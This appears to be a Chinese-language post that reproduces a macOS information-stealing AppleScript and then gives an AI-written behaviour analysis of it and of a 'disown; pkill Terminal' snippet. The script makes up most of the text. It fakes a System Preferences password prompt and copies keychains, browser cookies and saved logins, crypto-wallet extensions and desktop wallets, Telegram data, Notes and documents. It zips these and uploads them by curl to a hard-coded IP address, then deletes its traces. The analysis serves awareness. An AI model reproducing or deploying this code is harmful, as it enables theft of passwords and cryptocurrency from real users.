		set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews", "dumps", "emoji", "user_data", "__update__", "user_data#2", "user_data#3"}
		set fileList to list folder sourceFolder without invisibles
		mkdir(destinationFolder)
		repeat with currentItem in fileList
			if currentItem is not in exceptionsList then
				set itemPath to sourceFolder & "/" & currentItem
				set savePath to destinationFolder & "/" & currentItem
				if isDirectory(itemPath) then
					GrabFolder(itemPath, savePath)
				else
					readwrite(itemPath, savePath)
				end if
			end if
		end repeat
	end try
end GrabFolder
on parseFF(firefox, writemind)
	try
		set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
		set fileList to list folder firefox without invisibles
		repeat with currentItem in fileList
			set fpath to writemind & "ff/" & currentItem
			set readpath to firefox & currentItem
			repeat with FFile in myFiles
				readwrite(readpath & FFile, fpath & FFile)
			end repeat
		end repeat
	end try
end parseFF
on checkvalid(username, password_entered)
	try
		set result to do shell script "dscl . authonly " & quoted form of username & space & quoted form of password_entered
		if result is not equal to "" then
			return false
		else
			return true
		end if
	on error
		return false
	end try
end checkvalid
on getpwd(username, writemind)
	try
		if checkvalid(username, "") then
			set result to do shell script "security 2>&1 > /dev/null find-generic-password -ga \"Chrome\" | awk \"{print $2}\""
			writeText(result as string, writemind & "masterpass-chrome")
		else
			repeat
				set result to display dialog "Required Application Helper.\nPlease enter password for continue." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "System Preferences" with hidden answer
				set password_entered to text returned of result
				if checkvalid(username, password_entered) then
					writeText(password_entered, writemind & "pwd")
					return password_entered
				end if
			end repeat
		end if
	end try
	return ""
end getpwd
on grabPlugins(paths, savePath, pluginList, index)
	try
		set fileList to list folder paths without invisibles
		repeat with PFile in fileList
			repeat with Plugin in pluginList
				if (PFile contains Plugin) then
					set newpath to paths & PFile
					set newsavepath to savePath & "/" & Plugin
					if index then
						set newsavepath to newsavepath & "/IndexedDB/"
					end if
					GrabFolder(newpath, newsavepath)
				end if
			end repeat
		end repeat
	end try
end grabPlugins
on chromium(writemind, chromium_map)
	ERROR!
set pluginList to {"keenhcnmdmjjhincpilijphpiohdppno", "hbbgbephgojikajhfbomhlmmollphcad", "cjmkndjhnagcfbpiemnkdpomccnjblmj", "dhgnlgphgchebgoemcjekedjjbifijid", "hifafgmccdpekplomjjkcfgodnhcellj", "kamfleanhcmjelnhaeljonilnmjpkcjc", "jnldfbidonfeldmalbflbmlebbipcnle", "fdcnegogpncmfejlfnffnofpngdiejii", "klnaejjgbibmhlephnhpmaofohgkpgkd", "pdadjkfkgcafgbceimcpbkalnfnepbnk", "kjjebdkfeagdoogagbhepmbimaphnfln", "ldinpeekobnhjjdofggfgjlcehhmanlj", "dkdedlpgdmmkkfjabffeganieamfklkm", "bcopgchhojmggmffilplmbdicgaihlkp", "kpfchfdkjhcoekhdldggegebfakaaiog", "idnnbdplmphpflfnlkomgpfbpcgelopg", "mlhakagmgkmonhdonhkpjeebfphligng", "bipdhagncpgaccgdbddmbpcabgjikfkn", "gcbjmdjijjpffkpbgdkaojpmaninaion", "nhnkbkgjikgcigadomkphalanndcapjk", "bhhhlbepdkbapadjdnnojkbgioiodbic", "hoighigmnhgkkdaenafgnefkcmipfjon", "klghhnkeealcohjjanjjdaeeggmfmlpl", "nkbihfbeogaeaoehlefnkodbefgpgknn", "fhbohimaelbohpjbbldcngcnapndodjp", "ebfidpplhabeedpnhjnobghokpiioolj", "emeeapjkbcbpbpgaagfchmcgglmebnen", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "penjlddjkjgpnkllboccdgccekpkcbin", "fhilaheimglignddkjgofkcbgekhenbh", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "cihmoadaighcejopammfbmddcmdekcje", "lodccjjbdhfakaekdiahmedfbieldgik", "omaabbefbmiijedngplfjmnooppbclkk", "cjelfplplebdjjenllpjcblmjkfcffne", "jnlgamecbpmbajjfhmmmlhejkemejdma", "fpkhgmpbidmiogeglndfbkegfdlnajnf", "bifidjkcdpgfnlbcjpdkdcnbiooooblg", "amkmjjmmflddogmhpjloimipbofnfjih", "flpiciilemghbmfalicajoolhkkenfel", "hcflpincpppdclinealmandijcmnkbgn", "aeachknmefphepccionboohckonoeemg", "nlobpakggmbcgdbpjpnagmdbdhdhgphk", "momakdpclmaphlamgjcndbgfckjfpemp", "mnfifefkajgofkcjkemidiaecocnkjeh", "fnnegphlobjdpkhecapkijjdkgcjhkib", "ehjiblpccbknkgimiflboggcffmpphhp", "ilhaljfiglknggcoegeknjghdgampffk", "pgiaagfkgcbnmiiolekcfmljdagdhlcm", "fnjhmkhhmkbjkkabndcnnogagogbneec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "imlcamfeniaidioeflifonfjeeppblda", "mdjmfdffdcmnoblignmgpommbefadffd", "ooiepdgjjnhcmlaobfinbomgebfgablh", "pcndjhkinnkaohffealmlmhaepkpmgkb", "ppdadbejkmjnefldpcdjhnkpbjkikoip", "cgeeodpfagjceefieflmdfphplkenlfk", "dlcobpjiigpikoobohmabehhmhfoodbb", "jiidiaalihmmhddjgbnbgdfflelocpak", "bocpokimicclpaiekenaeelehdjllofo", "pocmplpaccanhmnllbbkpgfliimjljgo", "cphhlgmgameodnhkjdmkpanlelnlohao", "mcohilncbfahbmgdjkbpemcciiolgcge", "bopcbmipnjdcdfflfgjdgdjejmgpoaab", "khpkpbbcccdmmclmpigdgddabeilkdpd", "ejjladinnckdgjemekebdpeokbikhfci", "phkbamefinggmakgklpkljjmgibohnba", "epapihdplajcdnnkdeiahlgigofloibg", "hpclkefagolihohboafpheddmmgdffjm", "cjookpbkjnpkmknedggeecikaponcalb", "cpmkedoipcpimgecpmgpldfpohjplkpp", "modjfdjcodmehnpccdjngmdfajggaoeh", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "kncchdigobghenbbaddojjnnaogfppfj", "efbglgofoippbgcjepnhiblaibcnclgk", "mcbigmjiafegjnnogedioegffbooigli", "fccgmnglbhajioalokbcidhcaikhlcpm", "hnhobjmcibchnmglfbldbfabcgaknlkj", "apnehcjmnengpnmccpaibjmhhoadaico", "enabgbdfcbaehmbigakijjabdpdnimlg", "mgffkfbidihjpoaomajlbgchddlicgpn", "fopmedgnkfpebgllppeddmmochcookhc", "jojhfeoedkpkglbfimdfabpdfjaoolaf", "ammjlinfekkoockogfhdkgcohjlbhmff", "abkahkcbhngaebpcgfmhkoioedceoigp", "dcbjpgbkjoomeenajdabiicabjljlnfp", "gkeelndblnomfmjnophbhfhcjbcnemka", "pnndplcbkakcplkjnolgbkdgjikjednm", "copjnifcecdedocejpaapepagaodgpbh", "hgbeiipamcgbdjhfflifkgehomnmglgk", "mkchoaaiifodcflmbaphdgeidocajadp", "ellkdbaphhldpeajbepobaecooaoafpg", "mdnaglckomeedfbogeajfajofmfgpoae", "nknhiehlklippafakaeklbeglecifhad", "ckklhkaabbmdjkahiaaplikpdddkenic", "fmblappgoiilbgafhjklehhfifbdocee", "nphplpgoakhhjchkkhmiggakijnkhfnd", "cnmamaachppnkjgnildpdmkaakejnhae", "fijngjgcjhjmmpcmkeiomlglpeiijkld", "niiaamnmgebpeejeemoifgdndgeaekhe", "odpnjmimokcmjgojhnhfcnalnegdjmdn", "lbjapbcmmceacocpimbpbidpgmlmoaao", "hnfanknocfeofbddgcijnmhnfnkdnaad", "hpglfhgfnhbgpjdenjgmdgoeiappafln", "egjidjbpglichdcondbcbdnbeeppgdph", "ibljocddagjghmlpgihahamcghfggcjc", "gkodhkbmiflnmkipcmlhhgadebbeijhh", "dbgnhckhnppddckangcjbkjnlddbjkna", "mfhbebgoclkghebffdldpobeajmbecfk", "nlbmnnijcnlegkjjpcfjclmcfggfefdm", "nlgbhdfgdhgbiamfdfmbikcdghidoadd", "acmacodkjbdgmoleebolmdjonilkdbch", "agoakfejjabomempkjlepdflaleeobhb", "dgiehkgfknklegdhekgeabnhgfjhbajd", "onhogfjeacnfoofkfgppdlbmlmnplgbn", "kkpehldckknjffeakihjajcjccmcjflh", "jaooiolkmfcmloonphpiiogkfckgciom", "ojggmchlghnjlapmfbnjholfjkiidbch", "pmmnimefaichbcnbndcfpaagbepnjaig", "oiohdnannmknmdlddkdejbmplhbdcbee", "aiifbnbfobpmeekipheeijimdpnlpgpp", "aholpfdialjgjfhomihkjbmgjidlcdno", "anokgmphncpekkhclmingpimjmcooifb", "kkpllkodjeloidieedojogacfhpaihoh", "iokeahhehimjnekafflcihljlcjccdbe", "ifckdpamphokdglkkdomedpdegcjhjdp", "loinekcabhlmhjjbocijdoimmejangoa", "fcfcfllfndlomdhbehjjcoimbgofdncg", "ifclboecfhkjbpmhgehodcjpciihhmif", "dmkamcknogkgcdfhhbddcghachkejeap", "ookjlbkiijinhpmnjffcofjonbfbgaoc", "oafedfoadhdjjcipmcbecikgokpaphjk", "mapbhaebnddapnmifbbkgeedkeplgjmf", "cmndjbecilbocjfkibfbifhngkdmjgog", "kpfopkelmapcoipemfendmdcghnegimn", "lgmpcpglpngdoalbgeoldeajfclnhafa", "ppbibelpcjmhbdihakflkdcoccbgbkpo", "ffnbelfdoeiohenkjibnmadjiehjhajb", "opcgpfmipidbgpenhmajoajpbobppdil", "lakggbcodlaclcbbbepmkpdhbcomcgkd", "kgdijkcfiglijhaglibaidbipiejjfdp", "hdkobeeifhdplocklknbnejdelgagbao", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid", "nbdhibgjnjpnkajaghbffjbkcgljfgdi", "kmhcihpebfmpgmihbkipmjlmmioameka", "kmphdnilpmdejikjdnlbcnmnabepfgkh", "nngceckbapebfimnlniiiahkandclblb"}
	set chromiumFiles to {"/Network/Cookies", "/Cookies", "/Web Data", "/Login Data", "/Local Extension Settings/", "/IndexedDB/"}
	repeat with chromium in chromium_map
		set savePath to writemind & "Chromium/" & item 1 of chromium & "_"
		try
			set fileList to list folder item 2 of chromium without invisibles
			repeat with currentItem in fileList
				if ((currentItem as string) is equal to "Default") or ((currentItem as string) contains "Profile") then
					repeat with CFile in chromiumFiles
						set readpath to (item 2 of chromium & currentItem & CFile)
						if ((CFile as string) is equal to "/Network/Cookies") then
							set CFile to "/Cookies"
						end if
						if ((CFile as string) is equal to "/Local Extension Settings/") then
							grabPlugins(readpath, savePath & currentItem, pluginList, false)
						else if (CFile as string) is equal to "/IndexedDB/" then
							grabPlugins(readpath, savePath & currentItem, pluginList, true)
						else
							set writepath to savePath & currentItem & CFile
							readwrite(readpath, writepath)
						end if
					end repeat
				end if
			end repeat
		end try
	end repeat
end chromium
on telegram(writemind, library)
		try
			GrabFolder(library & "Telegram Desktop/tdata/", writemind & "Telegram Data/")
		end try
end telegram
on deskwallets(writemind, deskwals)
	repeat with deskwal in deskwals
		try
			GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal)
		end try
	end repeat
end deskwallets
on filegrabber(writemind)
	try
		set destinationFolderPath to POSIX file (writemind & "FileGrabber/")
		mkdir(destinationFolderPath)
		set photosPath to POSIX file (writemind & "FileGrabber/NotesFiles/")
		mkdir(photosPath)
		set extensionsList to {"txt", "pdf", "docx", "wallet", "key", "keys", "doc"}
		set bankSize to 0
		tell application "Finder"
			try
				set safariFolderPath to (path to home folder as text) & "Library:Cookies:"
				duplicate file (safariFolderPath & "Cookies.binarycookies") to folder destinationFolderPath with replacing
				set name of result to "saf1"
			end try
			try
				set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
				try
					duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
				end try
				set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
				set notesAccounts to folder (notesFolderPath & "Accounts:LocalAccount:Media")
				duplicate notesAccounts to photosPath with replacing
				duplicate notesAccounts to POSIX file photosPath as alias with replacing
				
				set notesFolder to folder notesFolderPath
				set notesFiles to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
				repeat with fileName in notesFiles
					set sourceFile to file fileName of notesFolder
					duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing
				end repeat
			end try
			try
				set desktopFiles to every file of desktop
				set documentsFiles to every file of folder "Documents" of (path to home folder)
				set downloadsFiles to every file of folder "Downloads" of (path to home folder)
				repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)
					set fileExtension to name extension of aFile
					if fileExtension is in extensionsList then
						set filesize to size of aFile
						if filesize < 3 * 1024 * 1024 then
							if (bankSize + filesize) < 30 * 1024 * 1024 then
								try
									duplicate aFile to folder destinationFolderPath with replacing
									set bankSize to bankSize + filesize
								end try
							else
								exit repeat
							end if
						end if
					end if
				end repeat
			end try
		end tell
	end try
end filegrabber
on send_data(attempt)
 try
  set result_send to (do shell script "curl -X POST -H \"user: DSIZump73tGw5VgWBw7O2gO0YYmE-XIZtGNBIquiJy0=\" -H \"BuildID: XUa9Ar8zYb34QfuY2LYQSkET98lL0Fg4SZ-1KbqYLAc=\" -H \"cl: 0\" -H \"cn: 0\" --max-time 300 -retry 5 -retry-delay 10 -F \"file=@/tmp/out.zip\" http://81.19.135.54/joinsystem")
 on error
  if attempt < 40 then
   delay 3
   send_data(attempt + 1)
  end if
 end try
end send_data
set username to (system attribute "USER")
set profile to "/Users/" & username
set randomNumber to do shell script "echo $((RANDOM % 9000 + 1000))"
set writemind to "/tmp/" & randomNumber & "/"
try
	set result to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
	writeText(result, writemind & "info")
end try
set library to profile & "/Library/Application Support/"
set password_entered to getpwd(username, writemind)
delay 0.01
set chromiumMap to {{"Chrome", library & "Google/Chrome/"}, {"Brave", library & "BraveSoftware/Brave-Browser/"}, {"Edge", library & "Microsoft Edge/"}, {"Vivaldi", library & "Vivaldi/"}, {"Opera", library & "com.operasoftware.Opera/"}, {"OperaGX", library & "com.operasoftware.OperaGX/"}, {"Chrome Beta", library & "Google/Chrome Beta/"}, {"Chrome Canary", library & "Google/Chrome Canary"}, {"Chromium", library & "Chromium/"}, {"Chrome Dev", library & "Google/Chrome Dev/"}, {"Arc", library & "Arc/"}, {"Coccoc", library & "Coccoc/"}}
set walletMap to {{"deskwallets/Electrum", profile & "/.electrum/wallets/"}, {"deskwallets/Coinomi", library & "Coinomi/wallets/"}, {"deskwallets/Exodus", library & "Exodus/"}, {"deskwallets/Atomic", library & "atomic/Local Storage/leveldb/"}, {"deskwallets/Wasabi", profile & "/.walletwasabi/client/Wallets/"}, {"deskwallets/Ledger_Live", library & "Ledger Live/"}, {"deskwallets/Monero", profile & "/Monero/wallets/"}, {"deskwallets/Bitcoin_Core", library & "Bitcoin/wallets/"}, {"deskwallets/Litecoin_Core", library & "Litecoin/wallets/"}, {"deskwallets/Dash_Core", library & "DashCore/wallets/"}, {"deskwallets/Electrum_LTC", profile & "/.electrum-ltc/wallets/"}, {"deskwallets/Electron_Cash", profile & "/.electron-cash/wallets/"}, {"deskwallets/Guarda", library & "Guarda/"}, {"deskwallets/Dogecoin_Core", library & "Dogecoin/wallets/"}, {"deskwallets/Trezor_Suite", library & "@trezor/suite-desktop/"}}
readwrite(library & "Binance/app-store.json", writemind & "deskwallets/Binance/app-store.json")
readwrite(library & "@tonkeeper/desktop/config.json", "deskwallets/TonKeeper/config.json")
readwrite(profile & "/Library/Keychains/login.keychain-db", writemind & "keychain")
if release then
	readwrite2(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite", writemind & "FileGrabber/NoteStore.sqlite")
	readwrite2(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal", writemind & "FileGrabber/NoteStore.sqlite-wal")
	readwrite2(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm", writemind & "FileGrabber/NoteStore.sqlite-shm")
	readwrite2(profile & "/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies", writemind & "FileGrabber/Cookies.binarycookies")
	readwrite(profile & "/Library/Cookies/Cookies.binarycookies", writemind & "FileGrabber/saf1")
end if
if filegrabbers then
	filegrabber(writemind)
end if
writeText(username, writemind & "username")
set ff_paths to {library & "Firefox/Profiles/", library & "Waterfox/Profiles/", library & "Pale Moon/Profiles/"}
repeat with firefox in ff_paths
	try
		parseFF(firefox, writemind)
	end try
end repeat
chromium(writemind, chromiumMap)
deskwallets(writemind, walletMap)
telegram(writemind, library)
do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/out.zip"
send_data(0)
do shell script "rm -r " & writemind
do shell script "rm /tmp/out.zip"
'&

找AI分析了一下这个脚本干了些什么

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# MacOS恶意软件行为分析报告

## 概述
这是一个针对MacOS系统的信息窃取型恶意软件。主要目标是窃取用户的敏感信息并将其上传到远程服务器。

## 主要行为特征

### 1. 系统信息收集
- 收集系统硬件和软件配置信息
- 获取用户名和用户目录信息
- 尝试获取用户密码

### 2. 浏览器数据窃取
目标包括多个主流浏览器:
- Chrome及其衍生浏览器(Brave, Edge等)
- Firefox及其衍生浏览器
- Safari
- Opera
窃取内容包括:
- Cookies
- 登录凭据
- 表单历史
- 浏览器数据库文件

### 3. 加密货币钱包窃取
针对多种加密货币钱包:
- Electrum
- Exodus
- Coinomi
- Atomic
- 其他主流钱包应用

### 4. 即时通讯数据窃取
- 针对Telegram客户端数据

### 5. 文件窃取
- 扫描桌面、文档和下载文件夹
- 主要针对文本文档、PDF等敏感文件
- 特别关注加密货币相关文件

### 6. 数据外泄
- 将收集的数据打包压缩
- 通过HTTP POST请求发送到远程服务器

脚本2(千万别运行)

1
disown; pkill Terminal

AI分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Unix命令组合分析

## 命令详解
disown; pkill Terminal


## 命令行为

### 1. disown
- 将进程从当前shell的任务列表中移除
- 使进程成为"孤儿进程"
- 即使终端关闭也会继续运行

### 2. pkill Terminal 
- 强制关闭Terminal终端程序

## 恶意软件中的用途
- 隐藏程序的运行痕迹
- 使恶意进程在后台持续运行
- 避免被用户通过终端发现和终止